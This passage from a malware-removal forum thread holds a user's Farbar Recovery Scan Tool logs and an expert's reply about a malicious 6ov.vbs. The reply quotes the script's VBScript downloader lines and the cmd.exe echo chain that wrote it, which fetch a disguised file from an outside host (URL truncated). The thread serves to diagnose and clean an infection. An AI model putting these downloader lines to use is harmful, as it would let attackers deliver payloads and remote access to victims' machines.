    2016-12-13 20:34 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
    2016-10-25 09:57 - 2016-10-25 09:57 - 00491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
    2016-04-01 13:57 - 2016-12-28 12:03 - 08924864 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll
    2016-08-06 14:07 - 2014-04-14 20:59 - 00389896 _____ () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
    2017-01-10 17:37 - 2017-01-20 07:47 - 02264352 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
    2017-01-10 17:37 - 2017-01-20 07:47 - 02254800 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
    2017-01-10 17:37 - 2017-01-20 07:47 - 02829776 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\arwlib.dll
    2016-09-29 12:48 - 2016-09-29 12:48 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
    2017-01-10 22:47 - 2016-12-21 02:09 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
    2017-02-01 08:44 - 2017-01-13 13:51 - 00023328 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\lang\en-us\bdsystray.txtui
    2017-01-10 22:45 - 2016-12-21 01:54 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
    2017-01-10 22:45 - 2016-12-21 01:48 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
    2017-01-10 22:45 - 2016-12-21 01:48 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
    2017-01-10 22:45 - 2016-12-21 01:48 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
    2017-01-10 22:45 - 2016-12-21 01:48 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
    2017-01-10 22:46 - 2016-12-21 01:53 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll

    ==================== Alternate Data Streams (Whitelisted) =========

    (If an entry is included in the fixlist, only the ADS will be removed.)

    AlternateDataStreams: C:\Users\Joseph\Downloads\AdwCleaner.exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\Firefox Setup Stub 51.0.1.exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\FRST64.exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\JRT (1).exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\JRT.exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\mb3-setup-cb.NT-3.0.6.1469.exe:BDU [0]

    ==================== Safe Mode (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="Service"

    ==================== Association (Whitelisted) ===============

    (If an entry is included in the fixlist, the registry item will be restored to default or removed.)


    ==================== Internet Explorer trusted/restricted ===============

    (If an entry is included in the fixlist, it will be removed from the registry.)


    ==================== Hosts content: ===============================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2015-10-30 02:24 - 2017-02-01 21:28 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts


    ==================== Other Areas ============================

    (Currently there is no automatic fix for this section.)

    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\Control Panel\Desktop\\Wallpaper -> C:\windows\web\wallpaper\Hewlett-Packard Backgrounds\backgroundDefault.jpg
    DNS Servers: 192.168.1.1
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
    Windows Firewall is enabled.

    ==================== MSCONFIG/TASK MANAGER disabled items ==


    ==================== FirewallRules (Whitelisted) ===============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    FirewallRules: [vm-monitoring-nb-session] => LPort=139
    FirewallRules: [{0308E923-8487-403F-B445-D15ED8CCCB95}] => C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVD Cinema\PowerDVDCinema.exe
    FirewallRules: [{E42A29D0-C19D-4D1C-8FE2-D850981AEBA8}] => C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVDMovie.exe
    FirewallRules: [{29F940E0-B1B5-45D6-9E75-4BECF8FB67FC}] => C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD14Agent.exe
    FirewallRules: [{B3262CE0-7120-40CC-B8E9-77C75A53DBCA}] => C:\Program Files (x86)\CyberLink\PowerDVD14\Kernel\DMS\CLMSServerPDVD14.exe
    FirewallRules: [{F580D45B-9B87-4478-9D02-4FB5710B4EE2}] => C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD.exe
    FirewallRules: [{6C97C639-83FE-4D5D-A976-D178E54ACEBA}] => C:\Program Files (x86)\Skype\Phone\Skype.exe
    FirewallRules: [{D49EDF57-C52E-467F-A056-63D5BD0738D7}] => C:\Program Files\Intel Corporation\Intel WiDi\SmartAgentTest.exe
    FirewallRules: [{261EA2B7-45BC-4067-83D5-2418ADCEE9C8}] => C:\Program Files\Intel Corporation\Intel WiDi\Next\WirelessDisplay.exe
    FirewallRules: [{B59EE6A4-D725-4298-9685-DFD41B59B982}] => C:\Program Files\Intel Corporation\Intel WiDi\WiDiAppOld.exe
    FirewallRules: [{CF4CA95C-09CF-4959-9D76-68426CDA477D}] => C:\Program Files\Intel Corporation\Intel WiDi\WiDiApp.exe
    FirewallRules: [{080A3C37-1740-4E2C-815C-189C744E6E60}] => c:\Program Files\CyberLink\PowerDirector12\PDR10.EXE
    FirewallRules: [{A9134569-28FB-4867-B6F4-AA1D2E5E15EE}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{0334F46F-ABB7-4487-AA0B-5C39528FE3FC}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{A0CD17AF-60E5-44AE-AC27-9328A673AC89}] => C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{970594D0-4429-4C70-838A-D147ED3FC01F}] => C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{DBA71186-0545-49C3-8B27-EF841C1940ED}] => C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
    FirewallRules: [{EA52B792-A898-4EF8-AD47-E12D2BF5BD0A}] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\DeviceSetup.exe
    FirewallRules: [{A89935E6-6E46-4459-BA52-726242012FAF}] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPNetworkCommunicator.exe
    FirewallRules: [{2C60681B-0038-4452-ADDE-3FC15C74708A}] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPNetworkCommunicatorCom.exe
    FirewallRules: [{0790D2E9-EA09-4D41-BA01-B8BC78ECD5DA}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    FirewallRules: [{DDE9F5AC-0598-494C-89AB-659FD2D18BBB}] => C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
    FirewallRules: [{C5ABB8F3-9C6A-48E2-9E61-D7DFAF7B05F7}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
    FirewallRules: [{D4F608B2-F97B-4617-8A32-8CEA999C5E3D}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{C23C9D12-7310-4478-8E06-5C73C5D2AC72}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{F04FC8DC-884B-4DD1-8B0B-79F29AED26C0}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{009CC8D2-7203-4597-901D-185455F173D9}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{5151A207-2082-465F-96EB-697F284CEFD2}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{A75B0F26-5FC7-48B3-8D4D-90756AE6443A}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
    FirewallRules: [{80B7AC85-64A5-4029-9123-68203C3004D3}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe

    ==================== Restore Points =========================

    15-01-2017 15:43:24 Installed TurboTax 2016 wrapper
    24-01-2017 15:52:44 Scheduled Checkpoint
    31-01-2017 20:53:13 end January 2017
    01-02-2017 17:15:49 JRT Pre-Junkware Removal
    01-02-2017 17:24:34 JRT Pre-Junkware Removal

    ==================== Faulty Device Manager Devices =============


    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (02/01/2017 09:23:19 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
    Description: Package Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy+CortanaUI was terminated because it took too long to suspend.

    Error: (02/01/2017 09:20:30 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
    Description: Package Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy+CortanaUI was terminated because it took too long to suspend.

    Error: (02/01/2017 09:18:22 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: IntelCpHDCPSvc.exe, version: 1.0.0.1, time stamp: 0x572a4b65
    Faulting module name: ntdll.dll, version: 10.0.14393.479, time stamp: 0x5825887f
    Exception code: 0xc0000005
    Fault offset: 0x000000000002f7db
    Faulting process id: 0xd20
    Faulting application start time: 0x01d27cfa9f3c35eb
    Faulting application path: C:\WINDOWS\system32\IntelCpHDCPSvc.exe
    Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
    Report Id: a8ea9bde-d760-4dbc-832c-0766ee78aa5b
    Faulting package full name:
    Faulting package-relative application ID:

    Error: (02/01/2017 09:18:16 PM) (Source: DPTF) (EventID: 256) (User: )
    Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.1.10608.329) TYPE: ERROR

    DPTF Build Version:  8.1.10608.329
    DPTF Build Date:  May 13 2016 11:00:20
    Source File:  ..\..\..\..\Sources\Policies\PolicyLib\PolicyBase.cpp @ line 673
    Executing Function:  PolicyBase::takeControlOfOsc
    Message:  Failed to acquire OSC: Failure during execution of _OSC:
    DPTF Build Version:  8.1.10608.329
    DPTF Build Date:  May 13 2016 11:00:20
    Source File:  ..\..\..\Sources\Manager\EsifServices.cpp @ line 473
    Executing Function:  EsifServices::primitiveExecuteSet
    Message:  Error returned from ESIF services interface function call
    Participant:  NoParticipant
    Domain:  NoDomain
    ESIF Primitive:  SET_OPERATING_SYSTEM_CAPABILITIES [93]
    ESIF Instance:  255
    ESIF Return Code:  ESIF_E_UNSUPPORTED_ACTION_TYPE [1202]


    Policy:  Passive Policy 2 [2]

    Error: (02/01/2017 09:18:16 PM) (Source: DPTF) (EventID: 256) (User: )
    Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.1.10608.329) TYPE: ERROR

    DPTF Build Version:  8.1.10608.329
    DPTF Build Date:  May 13 2016 11:00:20
    Source File:  ..\..\..\..\Sources\Policies\PolicyLib\PolicyBase.cpp @ line 673
    Executing Function:  PolicyBase::takeControlOfOsc
    Message:  Failed to acquire OSC: Failure during execution of _OSC:
    DPTF Build Version:  8.1.10608.329
    DPTF Build Date:  May 13 2016 11:00:20
    Source File:  ..\..\..\Sources\Manager\EsifServices.cpp @ line 473
    Executing Function:  EsifServices::primitiveExecuteSet
    Message:  Error returned from ESIF services interface function call
    Participant:  NoParticipant
    Domain:  NoDomain
    ESIF Primitive:  SET_OPERATING_SYSTEM_CAPABILITIES [93]
    ESIF Instance:  255
    ESIF Return Code:  ESIF_E_UNSUPPORTED_ACTION_TYPE [1202]


    Policy:  Critical Policy [1]


    System errors:
    =============
    Error: (02/01/2017 09:28:02 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/01/2017 09:27:58 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/01/2017 09:27:54 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/01/2017 09:27:50 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/01/2017 09:27:46 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/01/2017 09:27:42 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/01/2017 09:27:38 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/01/2017 09:27:34 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/01/2017 09:27:30 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/01/2017 09:27:26 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.


    CodeIntegrity:
    ===================================
      Date: 2017-02-01 21:18:20.909
      Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bitdefender\Bitdefender 2017\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements.

      Date: 2017-02-01 21:18:20.659
      Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


    ==================== Memory info ===========================

    Processor: Intel® Core™ i7-6500U CPU @ 2.50GHz
    Percentage of memory in use: 20%
    Total physical RAM: 16273.91 MB
    Available physical RAM: 12875.87 MB
    Total Virtual: 18705.91 MB
    Available Virtual: 15290.62 MB

    ==================== Drives ================================

    Drive c: (Windows) (Fixed) (Total:913.93 GB) (Free:825.38 GB) NTFS
    Drive d: (RECOVERY) (Fixed) (Total:16.35 GB) (Free:1.88 GB) NTFS ==>[system with boot components (obtained from drive)]
    Drive e: (Disc1) (CDROM) (Total:1 GB) (Free:0 GB) UDF

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (Size: 931.5 GB) (Disk ID: D379171D)

    Partition: GPT.

    ==================== End of Addition.txt ============================


    • 0

    #8
    RKinner

    RKinner

      Malware Expert

    • Expert
    • 20,031 posts
    • MVP

    The 6ov.vbs was definitely a piece of malware. This is what it was trying to do:

     

    Dim drgfgd, jhgfsf  
    Set drgfgd = CreateObject("Microsoft.XMLHTTP")
    Set jhgfsf = CreateObject("Adodb.Stream")

    drgfgd.Open "GET", "http://disk.karelia....etBdl/996.png",False 

     

     

    It basically downloaded a file from  http://disk.karelia.pro- when I clicked on the link in my own browser my Avast blocked my going there and said it was a malware site.  Supposedly it is downloading a .png file which should have been a picture but it's easy to change the extension once you get the file so it may have been a .exe or a compressed file with several exes in disguise.  Scumware.org has some bad things to say about the site:

     

    https://www.scumware...isk.karelia.pro

     

    It does appear to be part of the malware discussed here:

     

    https://www.hybrid-a...vironmentId=100

     

    These lines created your 60v.vbs file:

     

     

    cmd.exe cmd /c cd "%appdata%" &echo Dim drgfgd, jhgfsf >> 6ov.vbs &echo Set drgfgd = CreateObject("Microsoft.XMLHTTP")>> 6ov.vbs &echo Set jhgfsf = CreateObject("Adodb.Stream")>> 6ov.vbs &echo drgfgd.Open "GET", "http://disk.karelia....etBdl/996.png",False>> 6ov.vbs" (PID: 3672)

     

     

    Near as I can tell it is trying to install TeamViewer on your system so that someone can access it remotely.

     

    Run FRST again but this time put

    update_w32.exe;prtj.exe;svpn.exe;Book.xlt;Sheet.xlt

    (no spaces just a semicolon between the file names)

     

    in the box (you can copy the above line and paste it in if you want instead of typing it) then hit Search Files.  When it finishes, copy and paste the text from search.txt.

     

    Since you got the infection from an Excel file it may have infected your default Excel template so I'm also having it locate your default templates

     

    Before I forget:  You have a bad block on your hard drive.  You need to run a disk check.   See the instructions on:

     

    http://www.thewindow...cking-windows-8

     

    Ignore the stuff with a vertical line.  That's just ads.  Skip over them.

     

    You also probably need a new driver for your intel video.   


    • 0

    #9
    mw201

    mw201

      Member

    • Topic Starter
    • Member
    • PipPip
    • 15 posts

    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 29-01-2017
    Ran by Joseph (administrator) on JOSEPHW (02-02-2017 12:02:11)
    Running from C:\Users\Joseph\Downloads
    Loaded Profiles: Joseph (Available Profiles: Joseph)
    Platform: Windows 10 Home Version 1607 (X64) Language: English (United States)
    Internet Explorer Version 11 (Default browser: Chrome)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender Device Management\DevMgmtService.exe
    (Intel Corporation) C:\Windows\System32\igfxCUIService.exe
    (Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
    (Microsoft Corporation) C:\Windows\System32\wlanext.exe
    (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
    (Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
    (Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe
    (Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
    (Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
    (Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
    (Intel Corporation) C:\Windows\SysWOW64\esif_uf.exe
    (Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
    () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
    (HP Inc.) C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe
    (Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe
    (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe
    (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
    Failed to access process -> IntelCpHDCPSvc.exe
    (WildTangent) C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe
    (HP Inc.) C:\Program Files\HPCommRecovery\HPCommRecovery.exe
    (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
    (HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
    (Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
    (Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
    (Intel Corporation) C:\Windows\Temp\DPTF\esif_assist_64.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    (Intel Corporation) C:\Windows\System32\igfxEM.exe
    (Intel Corporation) C:\Windows\System32\igfxHK.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe
    (HP Development Company, L.P.) C:\Program Files (x86)\HP\HP CoolSense\CoolSense.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
    (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
    (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
    (Microsoft Corporation) C:\Windows\System32\dllhost.exe
    (Microsoft Corporation) C:\Windows\System32\msdt.exe
    (Microsoft Corporation) C:\Windows\System32\msdt.exe
    () C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1701.10102.0_x64__8wekyb3d8bbwe\Calculator.exe
    (Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
    (Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe

    ==================== Registry (Whitelisted) ====================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9181696 2017-01-13] (Realtek Semiconductor)
    HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
    HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27262432 2016-12-20] (Skype Technologies S.A.)
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\Run: [HP Photosmart 6520 series (NET)] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\ScanToPCActivationApp.exe [2573416 2012-10-17] (Hewlett-Packard Co.)
    HKU\S-1-5-18\...\RunOnce: [Application Restart #0] => C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe [371928 2016-07-16] (Microsoft Corporation)
    ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
    ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
    ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
    Startup: C:\Users\Joseph\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2016-10-31]
    ShortcutTarget: Send to OneNote.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE (Microsoft Corporation)

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
    Tcpip\..\Interfaces\{f314d896-c550-4d14-b773-fdf73ec6770f}: [DhcpNameServer] 192.168.1.1

    Internet Explorer:
    ==================
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://hp15-comm.msn.com/?pc=HRTE
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://hp15-comm.msn.com/?pc=HRTE
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE
    BHO: Bitdefender Wallet  -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-01-13] (Bitdefender)
    BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-12-28] (Microsoft Corporation)
    BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-12-28] (Microsoft Corporation)
    BHO-x32: Bitdefender Wallet -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-01-13] (Bitdefender)
    BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2016-07-21] (HP Inc.)
    Toolbar: HKLM - Bitdefender Wallet  - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-01-13] (Bitdefender)
    Toolbar: HKLM-x32 - Bitdefender Wallet - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-01-13] (Bitdefender)
    Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
    Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
    Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
    Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
    Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
